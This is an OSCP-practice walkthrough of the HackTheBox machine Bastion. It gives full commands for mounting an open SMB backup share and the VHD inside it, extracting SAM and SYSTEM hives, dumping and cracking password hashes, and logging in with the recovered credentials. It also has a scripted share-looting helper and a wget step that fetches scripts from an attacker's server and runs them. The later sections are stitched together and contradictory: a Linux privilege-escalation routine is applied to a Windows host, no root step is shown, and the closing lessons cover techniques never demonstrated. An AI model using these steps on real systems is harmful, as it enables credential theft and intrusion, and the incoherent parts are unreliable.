Road to OSCP 13: Bastion HackTheBox

Sharghaas
9 min read · Jan 22, 2024

Follow along in my OSCP journey, this is my target 13 of the TJNULL’s OSCP list.

How to use this walkthrough?

To avoid the typical answer-on-a-plate walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and to keep the Try Harder mantra real.

Let’s go!

Enumeration

I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.

python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.134

Autorecon

While it runs, I usually look at the _quick_tcp_nmap.txt file while waiting for the _full_tcp_nmap.txt to finish.

PORT      STATE SERVICE      REASON          VERSION
22/tcp    open  ssh          syn-ack ttl 127 OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
|   256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC

This machine is really nice because there are a lot of services and going through the process of checking them out will help you filter faster in the future.

SMB — 139,445

This is where Autorecon is really nice for us: if you go into your scan folder you'll see a list of script results for every service nmap found. Let's focus on SMB.

cat smbmap-list-contents.txt 

[!] Authentication error on 10.10.10.134
[+] Guest session IP: 10.10.10.134:445 Name: 10.10.10.134
[-] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\THAEXPIYGU, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
.\Backups\*
dr--r--r-- 0 Fri Feb 12 17:00:01 2021 .
dr--r--r-- 0 Fri Feb 12 17:00:01 2021 ..
dr--r--r-- 0 Fri Feb 12 17:00:01 2021 CRZONWVISU
fw--w--w-- 116 Tue Apr 16 07:43:19 2019 note.txt
fr--r--r-- 0 Fri Feb 22 07:43:28 2019 SDT65CB.tmp
dr--r--r-- 0 Fri Feb 12 17:00:01 2021 THAEXPIYGU
dr--r--r-- 0 Fri Feb 22 07:44:02 2019 WindowsImageBackup
.\Backups\WindowsImageBackup\*
dr--r--r-- 0 Fri Feb 22 07:44:02 2019 .
dr--r--r-- 0 Fri Feb 22 07:44:02 2019 ..
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 L4mpje-PC
.\Backups\WindowsImageBackup\L4mpje-PC\*
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 ..
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 Backup 2019-02-22 124351
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 Catalog
fr--r--r-- 16 Fri Feb 22 07:44:02 2019 MediaId
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 SPPMetadataCache
.\Backups\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\*
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 ..
fr--r--r-- 37761024 Fri Feb 22 07:44:03 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
fr--r--r-- 5418299392 Fri Feb 22 07:45:32 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
fr--r--r-- 1186 Fri Feb 22 07:45:32 2019 BackupSpecs.xml
fr--r--r-- 1078 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
fr--r--r-- 8930 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
fr--r--r-- 6542 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
fr--r--r-- 2894 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
fr--r--r-- 1488 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
fr--r--r-- 1484 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
fr--r--r-- 3844 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
fr--r--r-- 3988 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
fr--r--r-- 7110 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
fr--r--r-- 2374620 Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
.\Backups\WindowsImageBackup\L4mpje-PC\Catalog\*
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 ..
fr--r--r-- 5698 Fri Feb 22 07:45:32 2019 BackupGlobalCatalog
fr--r--r-- 7440 Fri Feb 22 07:45:32 2019 GlobalCatalog
.\Backups\WindowsImageBackup\L4mpje-PC\SPPMetadataCache\*
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 07:45:32 2019 ..
fr--r--r-- 57848 Fri Feb 22 07:45:32 2019 {cd113385-65ff-4ea2-8ced-5630f6feca8f}
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
.\IPC$\*
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 lsass
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ntsvcs
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 scerpc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-2e0-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 epmapper
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-1c4-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 eventlog
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-350-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 atsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-3dc-0
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 wkssvc
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 spoolss
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-5e8-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 trkwks
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 W32TIME_ALT
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 winreg
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 openssh-ssh-agent
fr--r--r-- 6 Sun Dec 31 19:03:58 1600 srvsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 vgauth-service
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-590-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-244-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-24c-0

What about the permissions?

Disk        Permissions     Comment
----        -----------     -------
ADMIN$      NO ACCESS       Remote Admin
Backups     READ, WRITE
C$          NO ACCESS       Default share
IPC$        READ ONLY       Remote IPC

HINT

What do these permissions allow us to do?

.

.

.

.

HINT

Ask ChatGPT the following question: “What can I do if the permissions of an SMB share are read/write”

.

.

.

.

Read access is what matters here: it lets us mount the share locally and walk the backup like a local filesystem ❤ (write access would also let us drop files into the share, which we do not need yet).

Let's mount the share we have access to:

sudo mkdir /mnt/backups
sudo mount -t cifs -o guest //10.10.10.134/Backups /mnt/backups

The -o guest option tells mount.cifs to use the same guest session smbmap got in with; without it you are prompted for a password.
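Share enumeration output gets long on boxes like this one, so here is an added helper (my own example, not part of the original walkthrough) that parses smbmap's listing into the two answers we actually want: which shares can be mounted or written to, and which files in them deserve a look, with their sizes. The input below is a constructed excerpt of the smbmap output shown above, with the whitespace collapsed the way the page shows it; the file-name heuristics and the 1 GiB "mount it in place" threshold are my own choices.

```python
import re
from dataclasses import dataclass

# Constructed sample: an excerpt of the smbmap listing above, whitespace collapsed
# exactly as the page shows it. The real output is far longer.
SMBMAP_OUTPUT = r"""
[+] Guest session IP: 10.10.10.134:445 Name: 10.10.10.134
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
.\Backups\*
dr--r--r-- 0 Fri Feb 12 17:00:01 2021 .
fw--w--w-- 116 Tue Apr 16 07:43:19 2019 note.txt
dr--r--r-- 0 Fri Feb 22 07:44:02 2019 WindowsImageBackup
.\Backups\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\*
fr--r--r-- 37761024 Fri Feb 22 07:44:03 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
fr--r--r-- 5418299392 Fri Feb 22 07:45:32 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
fr--r--r-- 1186 Fri Feb 22 07:45:32 2019 BackupSpecs.xml
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
"""

# smbmap prints a share line, then ".\Share\Dir\*" headers, then ls-style entries.
SHARE_RE = re.compile(r"^(\S+)\s+(NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)(?:\s+(.*))?$")
DIR_RE = re.compile(r"^\.\\(.+)\\\*$")
ENTRY_RE = re.compile(
    r"^([df])([rwx-]{9})\s+(\d+)\s+\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}\s+(.*)$"
)

# File names worth a second look in any backup share (my own heuristic list), and
# the size above which you mount the image in place instead of pulling it over the VPN.
CRED_FILES = {"sam", "system", "security", "ntds.dit"}
LOOT_EXT = {".vhd", ".vhdx", ".vmdk", ".bak", ".kdbx", ".txt", ".xml", ".config", ".ini"}
LARGE = 1 << 30


@dataclass
class FileEntry:
    path: str   # share-relative path, backslash separated
    size: int
    perms: str


def human_size(n: float) -> str:
    for unit in ("B", "KiB", "MiB", "GiB", "TiB"):
        if n < 1024 or unit == "TiB":
            return f"{n} B" if unit == "B" else f"{n:.1f} {unit}"
        n /= 1024


def parse_smbmap(text: str):
    """Return ({share: permissions}, [FileEntry]) from smbmap -R style output."""
    shares, files, cur_dir = {}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if (m := DIR_RE.match(line)):
            cur_dir = m.group(1)
        elif (m := SHARE_RE.match(line)):
            shares[m.group(1)] = m.group(2)
            cur_dir = None
        elif cur_dir is not None and (m := ENTRY_RE.match(line)):
            kind, perms, size, name = m.groups()
            if kind == "f":  # directories are only useful as path context
                files.append(FileEntry(f"{cur_dir}\\{name}", int(size), perms))
    return shares, files


def triage(text: str) -> dict:
    """Which shares to mount, which to abuse for writing, and what to look at first."""
    shares, files = parse_smbmap(text)
    loot = []
    for f in files:
        name = f.path.rsplit("\\", 1)[-1].lower()
        ext = name[name.rfind("."):] if "." in name else ""
        if name in CRED_FILES or ext in LOOT_EXT:
            advice = ("mount in place, too big to pull over the VPN"
                      if f.size >= LARGE else "fetch and inspect")
            loot.append((f.path, f.size, advice))
    return {
        "shares": shares,
        "mountable": [s for s, p in shares.items() if p in ("READ ONLY", "READ, WRITE")],
        "writable": [s for s, p in shares.items() if p in ("READ, WRITE", "WRITE ONLY")],
        "loot": loot,
    }


if __name__ == "__main__":
    result = triage(SMBMAP_OUTPUT)
    print("mount these:", result["mountable"], "| writable:", result["writable"])
    for path, size, advice in result["loot"]:
        print(f"{human_size(size):>10}  {path}  ->  {advice}")
```

Run it as is to see the 5.4 GB VHD flagged for in-place mounting while note.txt and the XML metadata are marked as cheap to fetch; point it at your own smbmap-list-contents.txt for a real engagement.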

It looks like we have a complete backup of a machine; how can we find a way in with that?

https://learn.microsoft.com/en-us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication

I imagine we should be able to restore the backup, or at least pull credentials out of the SAM file it contains.

What are those vhd files at the top?

Can we mount these?

https://stackoverflow.com/questions/36819474/how-can-i-attach-a-vhdx-or-vhd-file-in-linux

Let's install libguestfs, which provides guestmount:

sudo apt-get install libguestfs-tools

Create the mount folder, /mnt/test/backup here (just an example):

sudo mkdir -p /mnt/test/backup

The 37 MB VHD is far too small to hold a Windows installation; the 5.4 GB one is the OS disk, so that is the one to inspect. Mount it read-only straight from the CIFS mount rather than copying a 5 GB image over the VPN first, and quote the path because it contains spaces:

sudo guestmount --add "/mnt/backups/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --inspector --ro /mnt/test/backup

We look for passwords inside the Users folder but find nothing.

HINT

Where and how can we dump credentials???

.

.

.

.

I found this article; it seems password hashes can be recovered from a couple of different places, and one of them looks exactly like our use case:

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-hashes-from-sam-registry

Where the hell are SAM and SYSTEM hives?

Let's look at the Windows/System32/config folder inside the mounted VHD; that is where the registry hives live.

We copy the SAM and SYSTEM hives to our loot folder (the SYSTEM hive holds the boot key needed to decrypt the SAM) and dump them:

root@kali:/mnt/test/backup/Windows/System32/config# cp SAM /home/kali/Documents/HTB/lab/10.10.10.134/loot/
root@kali:/mnt/test/backup/Windows/System32/config# cp SYSTEM /home/kali/Documents/HTB/lab/10.10.10.134/loot/
cd /home/kali/Documents/HTB/lab/10.10.10.134/loot/
samdump2 ./SYSTEM ./SAM

You can also use impacket's secretsdump.py in offline mode:

/opt/impacket/examples/secretsdump.py LOCAL -system ./SYSTEM -sam ./SAM

Let’s crack the hash

Save the NT hash (the fourth colon-separated field of the dump line) to a file and run john, telling it the format explicitly so it does not guess LM:

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash_file

But I always check on crackstation to save some time if it’s already been cracked

creds L4mpje:bureaulampje

We should be able to use evil-winrm with those credentials:

evil-winrm -i 10.10.10.134 -u 'L4mpje' -p 'bureaulampje' -P 5985

If that is refused, remember that WinRM only lets in members of the local Administrators or Remote Management Users groups by default. SSH is open on 22 as well, so let's try that:

ssh l4mpje@10.10.10.134

We got the user flag!

Time for some shell upgrade 😉 This is the routine I use for Linux reverse shells; the SSH session we have here is already a fully interactive Windows shell, so it is not needed on this box, but for reference:

  1. python -c 'import pty; pty.spawn("/bin/bash")'
  2. Ctrl+Z
  3. stty raw -echo
  4. fg (nothing will show on the screen, just press enter a couple of times after the command)

Getting Root

The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.

Quick Wins

This is my generic Linux checklist; on a Windows host like this one the equivalents are whoami /priv, systeminfo, net user and a look through Program Files and the user profiles, but here it is as I run it on Linux targets:

sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with a db password or even a user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)

Nothing of interest unfortunately.

Enumeration scripts

This is where we upload our linpeas, LinEnum and Exploit Suggester (again Linux tooling; on a Windows target the counterpart is winPEAS, fetched with certutil or Invoke-WebRequest instead of wget).

On our attacking machine
We start by serving the folder that holds our scripts with Python's built-in HTTP server:

sudo python3 -m http.server 80

(sudo python -m SimpleHTTPServer 80 is the Python 2 equivalent.)

On the victim’s machine
We look for a writable folder, wget the scripts we want, give them the right permissions and finally execute them.

cd /tmp/
wget http://attacking_ip/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

If nothing is output, you sometimes need to execute it directly with bash:

bash linpeas.sh

There are a lot of interesting items in the linpeas output.

HINT

What seems to be the fastest way to get root out of the shiny things?

.

.

.

.

Let's look at the relevant items from the scan.

What did I learn?

  1. We learned why some backdoors might not come back to us due to firewalls blocking them, but also that our reverse shells could get blocked by a firewall. If a shell doesn't pick up after a while, start testing other ports, usually the ones which are exposed.
  2. A very fast way to get root is to check the program versions and look for exploits; the internet is filled with PoCs to exploit vulnerable software.
  3. We learned how to modify scripts by creating our own payloads with msfvenom. There is a lot more to explore with msfvenom but due to the length of the walkthrough I kept it short. Check these 2 references for more information on how to create your own payloads for different situations: https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/ and https://netsec.ws/?p=331
  4. We learned about GTFOBins and how it can help you quickly exploit SUIDs.

Stream

I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.


Sharghaas

Flying Squirrel that loves everything around hacking. Training for the OSCP exam come join me on my stream so we can struggle together twitch.tv/sharghaas